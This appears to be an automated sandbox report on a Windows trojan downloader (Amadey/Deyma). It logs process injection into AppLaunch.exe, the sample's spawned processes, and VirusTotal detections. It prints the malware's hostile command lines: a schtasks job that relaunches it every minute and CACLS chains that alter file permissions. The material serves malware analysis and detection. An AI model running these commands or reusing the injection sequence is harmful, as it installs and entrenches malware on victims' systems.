RegQueryValueExW Aug. 2, 2023, 4:57 p.m.	key_handle: 0x000007f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 2, 2023, 4:57 p.m.	key_handle: 0x000007f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 2, 2023, 4:57 p.m.	key_handle: 0x000007f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 2, 2023, 4:57 p.m.	key_handle: 0x000007f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 2, 2023, 4:57 p.m.	key_handle: 0x000007f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 2, 2023, 4:57 p.m.	key_handle: 0x000007f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Aug. 2, 2023, 4:57 p.m.	key_handle: 0x000007f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW Aug. 2, 2023, 4:57 p.m.	key_handle: 0x000007f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW Aug. 2, 2023, 4:57 p.m.	key_handle: 0x000007f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2212 called NtSetContextThread to modify thread in remote process 2324
NtSetContextThread Aug. 2, 2023, 4:57 p.m.	registers.eip: 1995571652 registers.esp: 2881792 registers.edi: 0 registers.eax: 4509278 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000020 process_identifier: 2324	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2212 resumed a thread in remote process 2324
NtResumeThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x00000020 suspend_count: 1 process_identifier: 2324	1	0	0

Uses suspicious command line tools or Windows utilities (6 events)

cmdline	CACLS "..\eb0f58bce7" /P "test22:N"
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y\|CACLS "..\eb0f58bce7" /P "test22:N"&&CACLS "..\eb0f58bce7" /P "test22:R" /E&&Exit
cmdline	CACLS "oneetx.exe" /P "test22:N"
cmdline	CACLS "oneetx.exe" /P "test22:R" /E
cmdline	cmd /k echo Y\|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y\|CACLS "..\eb0f58bce7" /P "test22:N"&&CACLS "..\eb0f58bce7" /P "test22:R" /E&&Exit
cmdline	CACLS "..\eb0f58bce7" /P "test22:R" /E

Tries to unhook Windows functions monitored by Cuckoo (1 event)

Time & API	Arguments	Status	Return	Repeated
__anomaly__ Aug. 2, 2023, 4:50 p.m.	tid: 2940 message: Encountered 65537 exceptions, quitting. subcategory: exception function_name:	1	0	0

Executed a process and injected code into it, probably while unpacking (50 out of 52 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Aug. 2, 2023, 4:56 p.m.	thread_identifier: 2732 thread_handle: 0x0000030c process_identifier: 2728 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\eb0f58bce7\oneetx.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\eb0f58bce7\oneetx.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\eb0f58bce7\oneetx.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000314	1	1
NtResumeThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x00000224 suspend_count: 1 process_identifier: 2728	1	0
CreateProcessInternalW Aug. 2, 2023, 4:57 p.m.	thread_identifier: 2796 thread_handle: 0x00000248 process_identifier: 2792 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000250	1	1
CreateProcessInternalW Aug. 2, 2023, 4:57 p.m.	thread_identifier: 2852 thread_handle: 0x000001dc process_identifier: 2848 current_directory: C:\Users\test22\AppData\Local\Temp\eb0f58bce7 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y\|CACLS "..\eb0f58bce7" /P "test22:N"&&CACLS "..\eb0f58bce7" /P "test22:R" /E&&Exit filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000023c	1	1
CreateProcessInternalW Aug. 2, 2023, 4:57 p.m.	thread_identifier: 2208 thread_handle: 0x000003cc process_identifier: 2212 current_directory: C:\Users\test22\AppData\Local\Temp\eb0f58bce7 filepath: C:\Users\test22\AppData\Local\Temp\1000127001\taskmask.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000127001\taskmask.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000127001\taskmask.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003f4	1	1
CreateProcessInternalW Aug. 2, 2023, 4:57 p.m.	thread_identifier: 2940 thread_handle: 0x000003f0 process_identifier: 2932 current_directory: C:\Users\test22\AppData\Local\Temp\eb0f58bce7 filepath: C:\Users\test22\AppData\Local\Temp\1000128101\rdpcllp.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000128101\rdpcllp.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000128101\rdpcllp.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003d8	1	1
CreateProcessInternalW Aug. 2, 2023, 4:57 p.m.	thread_identifier: 3024 thread_handle: 0x00000378 process_identifier: 3032 current_directory: C:\Users\test22\AppData\Local\Temp\eb0f58bce7 filepath: C:\Users\test22\AppData\Local\Temp\1000129001\taskhostclp.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000129001\taskhostclp.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000129001\taskhostclp.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003fc	1	1
CreateProcessInternalW Aug. 2, 2023, 4:57 p.m.	thread_identifier: 2924 thread_handle: 0x0000008c process_identifier: 2920 current_directory: C:\Users\test22\AppData\Local\Temp\eb0f58bce7 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000094	1	1
CreateProcessInternalW Aug. 2, 2023, 4:57 p.m.	thread_identifier: 2964 thread_handle: 0x00000088 process_identifier: 2960 current_directory: C:\Users\test22\AppData\Local\Temp\eb0f58bce7 filepath: C:\Windows\System32\cacls.exe track: 1 command_line: CACLS "oneetx.exe" /P "test22:N" filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000008c	1	1
CreateProcessInternalW Aug. 2, 2023, 4:57 p.m.	thread_identifier: 3016 thread_handle: 0x0000008c process_identifier: 3012 current_directory: C:\Users\test22\AppData\Local\Temp\eb0f58bce7 filepath: C:\Windows\System32\cacls.exe track: 1 command_line: CACLS "oneetx.exe" /P "test22:R" /E filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000094	1	1
CreateProcessInternalW Aug. 2, 2023, 4:57 p.m.	thread_identifier: 3064 thread_handle: 0x0000008c process_identifier: 3060 current_directory: C:\Users\test22\AppData\Local\Temp\eb0f58bce7 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000090	1	1
CreateProcessInternalW Aug. 2, 2023, 4:57 p.m.	thread_identifier: 1152 thread_handle: 0x00000094 process_identifier: 2056 current_directory: C:\Users\test22\AppData\Local\Temp\eb0f58bce7 filepath: C:\Windows\System32\cacls.exe track: 1 command_line: CACLS "..\eb0f58bce7" /P "test22:N" filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000008c	1	1
CreateProcessInternalW Aug. 2, 2023, 4:57 p.m.	thread_identifier: 2124 thread_handle: 0x0000008c process_identifier: 2120 current_directory: C:\Users\test22\AppData\Local\Temp\eb0f58bce7 filepath: C:\Windows\System32\cacls.exe track: 1 command_line: CACLS "..\eb0f58bce7" /P "test22:R" /E filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000090	1	1
NtResumeThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x000000a0 suspend_count: 1 process_identifier: 2960	1	0
NtResumeThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x0000009c suspend_count: 1 process_identifier: 3012	1	0
NtResumeThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x000000a0 suspend_count: 1 process_identifier: 2056	1	0
NtResumeThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x00000098 suspend_count: 1 process_identifier: 2120	1	0
CreateProcessInternalW Aug. 2, 2023, 4:57 p.m.	thread_identifier: 2364 thread_handle: 0x00000020 process_identifier: 2324 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000002c	1	1
NtGetContextThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x00000020	1	0
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 368640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000002c	1	0
WriteProcessMemory Aug. 2, 2023, 4:57 p.m.	buffer: base_address: 0x00400000 process_identifier: 2324 process_handle: 0x0000002c	1	1
WriteProcessMemory Aug. 2, 2023, 4:57 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2324 process_handle: 0x0000002c	1	1
NtSetContextThread Aug. 2, 2023, 4:57 p.m.	registers.eip: 1995571652 registers.esp: 2881792 registers.edi: 0 registers.eax: 4509278 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000020 process_identifier: 2324	1	0
NtResumeThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x00000020 suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x00000144 suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x000001b4 suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x000001f8 suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x00000240 suspend_count: 1 process_identifier: 2324	1	0
NtGetContextThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x00000148	1	0
NtGetContextThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x00000148	1	0
NtResumeThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x00000148 suspend_count: 1 process_identifier: 2324	1	0
NtGetContextThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x00000148	1	0
NtGetContextThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x00000148	1	0
NtResumeThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x00000148 suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x00000324 suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x0000035c suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x000004b4 suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x000006e4 suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x00000700 suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x0000074c suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x00000764 suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x0000077c suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x00000794 suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x000007ac suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x000007c8 suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x000007fc suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x000007a0 suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x00000744 suspend_count: 1 process_identifier: 2324	1	0
NtGetContextThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x00000148	1	0
NtGetContextThread Aug. 2, 2023, 4:57 p.m.	thread_handle: 0x00000148	1	0

File has been identified by 47 AntiVirus engines on VirusTotal as malicious (47 events)

Bkav	W32.Common.041B0B36
Lionic	Trojan.Win32.Deyma.4!c
Elastic	malicious (high confidence)
Cynet	Malicious (score: 99)
CAT-QuickHeal	Trojandownloader.Deyma
ALYac	Trojan.GenericKD.68411545
Cylance	unsafe
Sangfor	Downloader.Win32.Deyma.Vk38
CrowdStrike	win/malicious_confidence_100% (W)
K7GW	Trojan ( 0059d2b31 )
K7AntiVirus	Trojan ( 0059d2b31 )
Cyren	W32/ABRisk.ZRQS-8673
Symantec	Trojan.Gen.MBT
ESET-NOD32	a variant of Win32/GenCBL.DHF
Kaspersky	Trojan-Downloader.Win32.Deyma.gje
BitDefender	Trojan.GenericKD.68411545
MicroWorld-eScan	Trojan.GenericKD.68411545
Avast	Win32:Evo-gen [Trj]
Tencent	Malware.Win32.Gencirc.13eb1ec6
Emsisoft	Trojan.GenericKD.68411545 (B)
F-Secure	Trojan.TR/Dldr.Deyma.wpzvx
DrWeb	Trojan.Packed2.45510
VIPRE	Trojan.GenericKD.68411545
McAfee-GW-Edition	Artemis!Trojan
Trapmine	malicious.high.ml.score
FireEye	Generic.mg.89e9bc7a5d97370a
Sophos	Mal/Generic-S
Ikarus	Win32.Outbreak
GData	Trojan.GenericKD.68411545
Avira	TR/Dldr.Deyma.wpzvx
Gridinsoft	Trojan.Win32.Amadey.bot
Arcabit	Trojan.Generic.D413E099
ZoneAlarm	Trojan-Downloader.Win32.Deyma.gje
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
Google	Detected
McAfee	Artemis!89E9BC7A5D97
MAX	malware (ai score=86)
VBA32	BScope.TrojanPSW.Coins
Panda	Trj/Chgt.AD
TrendMicro-HouseCall	TROJ_GEN.R002H0DGT23
Rising	Stealer.Agent!8.C2 (TFE:5:bzUFKwFqakH)
Yandex	Trojan.GenCBL!GEB027V7fpI
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	W32/GenCBL.DHF!tr
BitDefenderTheta	Gen:NN.ZexaF.36348.@J1@ai8f3Xfi
AVG	Win32:Evo-gen [Trj]
DeepInstinct	MALICIOUS

taskmaskamd.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All